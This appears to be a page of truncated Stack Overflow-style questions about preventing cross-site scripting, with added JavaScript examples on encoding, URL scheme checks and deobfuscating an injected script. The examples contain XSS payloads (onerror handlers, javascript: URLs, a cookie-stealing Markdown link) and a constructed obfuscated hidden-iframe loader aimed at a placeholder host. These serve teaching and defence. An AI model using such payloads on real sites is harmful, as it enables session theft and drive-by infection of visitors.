I know the drill for finding XSS and injection on sites made with JavaScript, PHP, Java, MySQL...
Basically, I know how to write the bugs, so I know how to find them.
Now I'm evaluating a product whose frontend is Flash. What are the common mistakes I should be looking for?
...
Does ASP.NET have a built-in mechanism that can sanitize all textbox input instead of redirecting to the error page?
I have a textbox input where a user can enter a name, but if they try to enter any <> tags the page automatically throws an error. I just want to handle this error in a user-friendly way.
...
In my web application I allow user-generated content to be posted for public consumption, similar to Stack Overflow.
What is the best practice for handling this?
My current steps for handling user-generated content are:
I use MarkItUp to allow users an easy way to format their HTML.
After a user has submitted their changes I run it thr...
I just ran across a question with an answer suggesting the AntiXss library to avoid cross-site scripting. Sounded interesting; reading the MSDN blog, it appears to just provide an HtmlEncode() method. But I already use HttpUtility.HtmlEncode().
Why would I want to use AntiXss.HtmlEncode over HttpUtility.HtmlEncode?
Indeed, I am not the...
Is this regular expression enough to catch all cross-site scripting attempts when embedding HTML into the DOM, e.g. with document.write()?
(javascript:|<\s*script.*?\s*>)
It is referenced in this document from modsecurity.com
http://www.modsecurity.org/documentation/Ajax%5FFingerprinting%5Fand%5FFiltering%5Fwith%5FModSecurity%5...
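An added check, not part of the question above: running the quoted pattern exactly as written (no flags) against a few constructed payloads that reach the DOM through document.write() shows what it misses. Every payload string below is constructed for this example.

```javascript
// Added example, not from the question above: the quoted pattern as written (no flags).
const pattern = /(javascript:|<\s*script.*?\s*>)/;

// Constructed payloads. This first group is what the pattern is meant to stop.
const CAUGHT = [
  '<script>alert(1)</script>',
  '<a href="javascript:alert(1)">x</a>',
];

// Each of these executes script in a browser, yet contains neither a lowercase
// "<script" nor a literal lowercase "javascript:".
const MISSED = [
  '<img src=x onerror=alert(1)>',             // event-handler attribute, no <script> tag at all
  '<svg onload=alert(1)>',                    // same idea via an inline SVG element
  '<SCRIPT>alert(1)</SCRIPT>',                // tag names are case-insensitive, the regex is not
  '<a href="JavaScript:alert(1)">x</a>',      // URL schemes are case-insensitive as well
  '<a href="javascript&#58;alert(1)">x</a>',  // the HTML entity for ":" is decoded inside the attribute
];

// True when the pattern would flag the payload.
function isCaught(payload) {
  return pattern.test(payload);
}

// Returns the payloads from a list that the pattern lets through untouched.
function survivors(payloads) {
  return payloads.filter((p) => !isCaught(p));
}
```

The takeaway is that a blocklist regex applied to a DOM sink only catches the shapes its author thought of; the fix is to encode for the context (HTML text or attribute) or to use a DOM API such as textContent that cannot create elements, not to extend the pattern.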
I have a requirement in Classic ASP: I am using a textbox to store a numeric variable, then I am passing it to the next page to be passed to a stored procedure.
Now I am facing XSS issues, so I want to encode the value of the textbox on the parent page and then use it on the other page. I know the stored procedure will not run after getting the encode...
I'm currently in the process of developing a GWT 1.7.1 application that deals with a significant amount of persistent, user-generated data, so there is a risk of malicious XSS. One of the steps I am taking to prevent this is using org.apache.commons.lang.StringEscapeUtils.escapeHtml() server-side (Yes I am well aware that this will not pr...
I have an ASP.NET application that will display a Dataset's XML in a textbox when a button is clicked.
Clicking the button again should rerun the request, but before this can happen I get an error saying 'A potentially dangerous Request.Form value was detected from the client (txtXML="<NewDataSet> ...)' Obviously, the angle brackets ar...
I have a website, and I just discovered that somehow someone injected JavaScript on my page. How can I figure out what it does and how they did it?
<script> var x = unescape("%68% (**** some other hex characters here
****%74%2e%63%6e%2f%76%69%64");document.write("<i"+"fr"+"am"+"e
s"+"r"+"c=\""+x+"/ind"+"e"+"x.p"+"hp\" w"+"id"+"th=\"0\" ...
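One way to see what a snippet of this shape does without running it, added here as an example and not from the poster: reverse the two obfuscation tricks statically (unescape() over %XX-encoded bytes, and a string chopped into pieces joined with +) and reconstruct the markup that document.write() would emit. The sample below is constructed in the same shape as the snippet above with a placeholder domain; it is not the poster's actual payload, which is truncated on the page.

```javascript
// Added example: static decoding of an injected snippet of the shape shown above.
// Nothing here executes the attacker's code; it only undoes the encoding.

// Constructed sample (placeholder domain), not the poster's real payload.
const SAMPLE = '<script> var x = unescape("%68%74%74%70%3a%2f%2f%65%76%69%6c%2e%65%78%61%6d%70%6c%65");'
  + 'document.write("<i"+"fr"+"am"+"e s"+"r"+"c=\\""+x+"/ind"+"e"+"x.p"+"hp\\" w"+"id"'
  + '+"th=\\"0\\" height=\\"0\\"></i"+"frame>");</script>';

// Equivalent of JavaScript's unescape(): %XX and %uXXXX sequences back to characters.
function decodeUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Turn a double-quoted JS string literal (with \" \\ \/ escapes) into its value.
function parseLiteral(lit) {
  return lit.slice(1, -1).replace(/\\(.)/g, '$1');
}

// Split a "a"+"b"+x+"c" expression on the + signs that lie outside string literals.
function splitConcat(expr) {
  const parts = [];
  let cur = '';
  let inStr = false;
  for (let i = 0; i < expr.length; i++) {
    const ch = expr[i];
    if (inStr) {
      cur += ch;
      if (ch === '\\') { cur += expr[++i]; continue; }  // keep escaped char with its backslash
      if (ch === '"') inStr = false;
    } else if (ch === '"') {
      inStr = true;
      cur += ch;
    } else if (ch === '+') {
      parts.push(cur.trim());
      cur = '';
    } else {
      cur += ch;
    }
  }
  parts.push(cur.trim());
  return parts;
}

// Returns { vars, writes }: decoded string variables and the markup each document.write() emits.
function deobfuscate(js) {
  // 1. Replace every unescape("...") call with the decoded literal.
  const src = js.replace(/unescape\("([^"]*)"\)/g, (_, hex) => JSON.stringify(decodeUnescape(hex)));
  // 2. Collect simple string bindings of the form var x = "...";
  const vars = {};
  for (const m of src.matchAll(/var\s+(\w+)\s*=\s*("(?:[^"\\]|\\.)*")/g)) {
    vars[m[1]] = parseLiteral(m[2]);
  }
  // 3. Resolve each document.write(...) argument: literals are unescaped, known variables substituted.
  const writes = [];
  for (const m of src.matchAll(/document\.write\(([\s\S]*?)\);/g)) {
    const pieces = splitConcat(m[1]).map((tok) =>
      (tok.startsWith('"') ? parseLiteral(tok) : (tok in vars ? vars[tok] : `<${tok}?>`)));
    writes.push(pieces.join(''));
  }
  return { vars, writes };
}
```

Run against the sample this yields a zero-size iframe pointing at the decoded host, which answers the "what does it do" half of the question; the "how did they get it in" half still needs the server logs and a diff of the page source against a known-good copy.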
I have a Web application and have run an XSS scan on it, and it reports that one of my pages that has a Java applet in it could potentially be open to XSS.
The test managed to assign a javascript alert box to the following HTML code:
<param name='id' value='' onMouseOver=alert(40041)>
My question is - Is this a valid test? Will doing ...
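A worked contrast, added here and not part of either the AntiXss question or the applet question above: what a four-character encoder does to a payload of the kind the scanner injected into that single-quoted value='' attribute, versus an encoder that also covers the apostrophe, versus an allowlist encoder in the AntiXss style. The one fact relied on is that the apostrophe was not among the characters HttpUtility.HtmlEncode handled before .NET Framework 4.0; the allowlist's safe set below is this example's own choice, not AntiXss's exact table, and the payload is constructed to match the shape of the scanner's finding.

```javascript
// Added example, not from the questions above: three HTML encoders applied to a
// payload aimed at a single-quoted attribute such as <param name='id' value='...'>.
const PAYLOAD = "' onMouseOver=alert(40041) x='";   // constructed, shaped like the scanner's finding

// Blocklist of four characters: & < > " only. Note: no apostrophe.
function encodeFour(s) {
  return s.replace(/[&<>"]/g, (c) => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;' })[c]);
}

// The same plus the apostrophe (as &#39;), which is what closes a single-quoted attribute.
function encodeFive(s) {
  return encodeFour(s).replace(/'/g, '&#39;');
}

// Allowlist in the AntiXss style: anything outside a small safe set becomes a numeric entity.
// Safe set (letters, digits, space, comma, period, hyphen, underscore) is this example's assumption.
function encodeAllowlist(s) {
  return s.replace(/[^A-Za-z0-9 ,.\-_]/g, (c) => `&#x${c.charCodeAt(0).toString(16)};`);
}

// The template the applet page effectively uses: attacker data inside single quotes.
function renderParam(encodedValue) {
  return `<param name='id' value='${encodedValue}'>`;
}

// True when encoded output can still terminate a single-quoted attribute.
function breaksSingleQuotes(encoded) {
  return encoded.includes("'");
}
```

With encodeFour the payload passes through unchanged and the rendered tag gains an onMouseOver handler, which is exactly the finding the scanner reported; either of the other two encoders keeps the value inside its quotes. The applet test is therefore valid whenever the param value is built from request data with a four-character encoder, and the fix is to encode for the attribute context rather than to argue about whether a param tag can "run" anything.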
Ok, so I have been reading about Markdown here on SO and elsewhere, and the steps between user input and the DB are usually given as
convert markdown to html
sanitize html (w/whitelist)
insert into database
but to me it makes more sense to do the following:
sanitize markdown (remove all tags - no exceptions)
convert to html
insert ...
I have a form text field that accepts a url. When the form is submitted, I insert this field into the database with proper anti-sql-injection. My question though is about xss.
This input field is a url and I need to display it again on the page. How do I protect it from xss on the way into the database (I think nothing is needed since ...
I've implemented a PDF generation function in my flex app using alivePDF, and I'm wondering if the process I've used to get the file to the user creates an XSS vulnerability.
This is the process I'm currently using:
Create the PDF in the flex application.
Send the binary PDF file to the server using a POST, along with the filename to ...
I'm working on an app that would allow people to enter arbitrary URLs that would be included in <a href="ARBITRARY URL"> and <img src="ARBITRARY URL" /> tags.
What type of security risks am I looking at?
The app is coded in PHP, and the only security countermeasure I currently perform is using PHP's htmlentities() function against the...
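An added example, not part of the Markdown-ordering question, the URL-field question or the href/src question above, that serves all three: it shows why stripping tags from Markdown before conversion is not enough (a link needs no < at all to carry a javascript: URL), and then the check a URL needs before it goes into href or src, which htmlentities() alone does not give you: an allowlist of schemes, normalised the way browsers parse URLs, plus attribute encoding of the result. The Markdown link rule is a minimal stand-in written for this example, not a real converter, and all inputs are constructed.

```javascript
// Added example, not from the questions above.

// (a) Markdown containing no '<', so a "remove all tags" pass leaves it untouched...
const MD = '[click me](javascript:document.location=document.cookie)';   // constructed input

function stripAllTags(s) {
  return s.replace(/<[^>]*>/g, '');
}

// ...yet the link rule of any converter turns it into an anchor whose href runs script.
// Minimal stand-in for a Markdown converter's link rule, not a real Markdown library.
function naiveMarkdownLink(md) {
  return md.replace(/\[([^\]]*)\]\(([^)]*)\)/g, (_, text, url) => `<a href="${url}">${text}</a>`);
}

// (b) The check to run on any user URL before it reaches href or src.
// Browsers drop ASCII tab/LF/CR anywhere in a URL and strip leading/trailing C0 controls
// and spaces before reading the scheme, so normalise the same way first; otherwise
// "java\tscript:" would be classified as relative and pass.
const LINK_SCHEMES = new Set(['http', 'https', 'mailto']);
const IMAGE_SCHEMES = new Set(['http', 'https']);

function safeUrl(raw, allowed = LINK_SCHEMES) {
  const cleaned = raw.replace(/[\t\n\r]/g, '').replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  if (m === null) return cleaned;                 // no scheme: a relative URL, cannot be javascript:
  return allowed.has(m[1].toLowerCase()) ? cleaned : null;
}

// Five-character encoding, enough for text content and double- or single-quoted attributes.
function encodeHtml(s) {
  return s.replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' })[c]);
}

// A rejected URL degrades to plain text; the link is dropped rather than "fixed up".
function renderLink(text, url) {
  const href = safeUrl(url);
  if (href === null) return encodeHtml(text);
  return `<a href="${encodeHtml(href)}">${encodeHtml(text)}</a>`;
}

function renderImage(url, alt) {
  const src = safeUrl(url, IMAGE_SCHEMES);
  if (src === null) return '';
  return `<img src="${encodeHtml(src)}" alt="${encodeHtml(alt)}">`;
}
```

Two details are worth noticing. An entity-smuggled scheme such as javascript&#58;alert(1) has no literal colon, so safeUrl treats it as relative; that is only safe because encodeHtml then turns the & into &amp;, so the browser never decodes the entity back into a colon. And the check does not need to be run at insert time at all: the field can be stored as typed and validated and encoded on the way out, which is also what keeps the stored value usable for anything other than HTML.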
Hi folks:
We have a long-running website where XSS lurks. The problem comes from some developers directly retrieving Request["sth"], without using HtmlEncode/Decode(), to do the processing and put it on the web.
I wonder if there is any mechanism like HTTPModule to help us HtmlEncode() all the items in a Http request to avoid XSS to so...
In your experience, what have you found, worked on, or encountered in terms of site vulnerabilities? And what actions did you take to mitigate these issues?
This may include XSS (cross-site scripting), SQL injection attacks, plain old DDoS or phishing attempts on your site's customers. Only yesterday I came across an entire section of ...
Does anyone know if jsbin.com implements any protection against XSS or other JavaScript attacks?
I see jsbin links used fairly regularly on sites like this one and I can't find any indication from the site one way or another. If it does implement countermeasures, what kinds of things does it block out? If not, I should probably be more carefu...
I'm building a webpart for a SharePoint site that allows the user to enter information into a textbox that will eventually be shown to other users. The problem is that I need to allow simple formatting (bold, italic etc.) and also allow the user to enter a URL (an <a href=".....). I don't want to expose an XSS exploit since I do not trust...
We have a business partner that is IFRAMEing some data to one of our web pages. I would like to limit his JS abilities to interact only inside of the IFRAME as well as his PHP abilities. Is this something that is setup automatically or do I have to make sure that these capabilities are assigned somewhere. Thanks for the help.
...
Note: I'm using Zend Framework, but I think most of this applies to PHP coding in general.
I'm trying to choose a strategy for writing views scripts, possibly with the help of a templating engine. Motivations: clarity and security. I'm just not happy with writing .phtml scripts. This syntax is awfully verbose to do the most often needed...